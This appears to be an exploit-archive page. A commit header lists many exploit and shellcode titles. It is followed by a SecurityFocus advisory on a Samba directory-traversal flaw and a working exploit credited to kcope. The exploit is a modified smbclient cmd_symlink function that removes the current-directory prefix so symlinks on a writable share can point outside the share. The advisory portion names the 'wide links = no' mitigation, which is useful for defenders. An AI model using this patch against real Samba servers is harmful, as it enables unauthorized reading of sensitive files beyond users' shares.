880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
83 lines
No EOL
3 KiB
Text
83 lines
No EOL
3 KiB
Text
source: https://www.securityfocus.com/bid/38111/info
|
|
|
|
Samba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
|
|
|
|
Exploits would allow an attacker to access files outside of the Samba user's root directory to obtain sensitive information and perform other attacks.
|
|
|
|
To exploit this issue, attackers require authenticated access to a writable share. Note that this issue may be exploited through a writable share accessible by guest accounts.
|
|
|
|
NOTE: The vendor stated that this issue stems from an insecure default configuration. The Samba team advises administrators to set 'wide links = no' in the '[global]' section of 'smb.conf'.
|
|
|
|
smbclient patch (exploit):
|
|
|
|
samba-3.4.5/source3/client/client.c
|
|
/****************************************************************************
|
|
UNIX symlink.
|
|
****************************************************************************/
|
|
|
|
static int cmd_symlink(void)
|
|
{
|
|
TALLOC_CTX *ctx = talloc_tos();
|
|
char *oldname = NULL;
|
|
char *newname = NULL;
|
|
char *buf = NULL;
|
|
char *buf2 = NULL;
|
|
char *targetname = NULL;
|
|
struct cli_state *targetcli;
|
|
|
|
if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
|
|
!next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
|
|
d_printf("symlink <oldname> <newname>\n");
|
|
return 1;
|
|
}
|
|
oldname = talloc_asprintf(ctx,
|
|
"%s", // << HERE modified
|
|
buf);
|
|
if (!oldname) {
|
|
return 1;
|
|
}
|
|
newname = talloc_asprintf(ctx,
|
|
"%s", // << HERE modified
|
|
buf2);
|
|
if (!newname) {
|
|
return 1;
|
|
}
|
|
/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
|
|
oldname = talloc_asprintf(ctx,
|
|
"%s%s", // < modified (see above)
|
|
client_get_cur_dir(), // < removed (see above)
|
|
buf);
|
|
if (!oldname) {
|
|
return 1;
|
|
}
|
|
newname = talloc_asprintf(ctx,
|
|
"%s%s", // < modified (see above)
|
|
client_get_cur_dir(), // < removed (see above)
|
|
buf2);
|
|
if (!newname) {
|
|
return 1;
|
|
}
|
|
----------------------------------------------*/
|
|
|
|
if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
|
|
d_printf("link %s: %s\n", oldname, cli_errstr(cli));
|
|
return 1;
|
|
|
|
}
|
|
|
|
if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
|
|
d_printf("Server doesn't support UNIX CIFS calls.\n");
|
|
return 1;
|
|
}
|
|
|
|
if (!cli_unix_symlink(targetcli, targetname, newname)) {
|
|
d_printf("%s symlinking files (%s -> %s)\n",
|
|
cli_errstr(targetcli), newname, targetname);
|
|
return 1;
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
// Cheers,
|
|
// kcope |